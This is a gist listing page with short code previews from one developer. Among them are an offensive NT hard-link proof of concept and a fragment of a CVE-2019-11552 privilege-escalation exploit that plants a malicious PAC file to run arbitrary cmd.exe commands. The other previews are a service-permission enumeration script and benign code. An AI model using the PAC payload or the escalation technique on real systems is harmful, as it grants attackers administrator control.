bordplate
/ Native-HardlinkEx.ps1
Created
December 6, 2019 15:43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Native-HardLink { | |
| <# | |
| .SYNOPSIS | |
| This is a proof-of-concept for NT hard links. There are some advantages, from an offensive | |
| perspective, to using NtSetInformationFile to create hard links (as opposed to | |
| mklink/CreateHardLink). NtSetInformationFile allows us link to files we don’t have write | |
| access to. In the script I am performing some steps which are not strictly speaking | |
| necessary, like using GetFullPathName for path resolution, I have done this mostly to | |
| educate myself. |
bordplate
/ Invoke-CrashPlanElevation.ps1
Last active
February 17, 2021 18:54
Exploit code for CVE-2019-11552. Adds current user to the local administrators group.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Create-FakePAC | |
| { | |
| Param( | |
| [String]$Command | |
| ) | |
| $fileContents = @" | |
| function FindProxyForURL(url, host) { | |
| new java.lang.ProcessBuilder["(java.lang.String[])"](["cmd.exe"], ["/c \"${Command}\""]).start(); |
bordplate
/ securing-php-lua-interpreter.php
Last active
April 4, 2018 20:12
Attempting to secure the PHP Lua interpreter
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $lua = new Lua(); | |
| // Listing all loaded Lua libraries using Lua code | |
| $result = $lua->eval(' | |
| local libraries = "" | |
| for k in pairs(_ENV) do libraries = libraries .. k .. "," end | |
| return libraries | |
| '); | |
| $luaLibs = explode(',', $result); // Split them into an array |
bordplate
/ temp_proxy.py
Last active
March 28, 2018 15:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from flask import Flask, request | |
| import urllib.request | |
| import requests | |
| app = Flask(__name__) | |
| allowed_characters = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZæøåÆØÅäöÄÖ .@-" | |
bordplate
/ service-permission-enumeration.vbs
Created
November 18, 2017 19:52
Script to enumerate services on a Windows system and list their permissions. Writes to a file in folder called services.txt. Run with `cscript service-permissions-enumeration.vbs`
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| strComputer = "." | |
| Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") | |
| Set colListOfServices = objWMIService.ExecQuery ("Select * from Win32_Service ") | |
| Set objShell = CreateObject("Wscript.Shell") | |
| Set objFSO = CreateObject("Scripting.FileSystemObject") | |
| For Each objService in colListOfServices | |
| Dim path, x | |
| path = objService.PathName | |
| x = Instr(path,"-") | |
| If x Then path = Left(path,x-1) |
bordplate
/ User.swift
Created
March 23, 2017 14:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public class User: NSObject { | |
| var username: String | |
| var displayName: String | |
| var followerCount: Int | |
| var followingCount: Int | |
| var joinDate: Date | |
| var posts: Array<[String: AnyObject]> |